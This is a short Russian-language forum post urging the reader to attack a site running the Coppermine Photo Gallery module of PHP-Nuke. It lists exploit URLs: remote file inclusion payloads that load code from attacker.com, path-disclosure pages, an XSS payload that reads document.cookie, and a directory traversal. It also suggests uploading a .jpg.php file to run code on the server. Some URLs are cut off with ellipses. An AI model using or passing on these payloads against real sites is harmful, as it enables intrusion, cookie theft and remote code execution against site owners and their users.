Вообщем, попробуй зайти на страницу фотогалерея, там внизу страницы имеется надпись: Powered by Coppermine Photo Gallery. У этого скрипта есть несколько багов вот они:
1 PHP including:

http://localhost/nuke69j1/modules/co..._DIR=http://at tacker.com
http://localhost/nuke72/modules/copp...//attacker.com
http://localhost/nuke72/modules/copp...//attacker.com
http://localhost/nuke72/modules/coppermine/themes/ma ze/theme.php?THEME_DIR=http://attacker.com

2. Раскрытие инсталляционного пути:
http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
ht tp://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/copp...splayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/copp...e/crop.inc.php

3. XSS:
http://localhost/nuke72/modules/copp...php?CPG_URL=fo obar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert( document.cookie);>

4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями):
http://localhost/nuke72/modules.php?...w&startdir=../..

Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации. Пример см. в источнике сообщения.

Можешь попробывать загрузить файл с расширения .jpg.php, вместо картинки!

Информация предоставлена по данным SecurityLab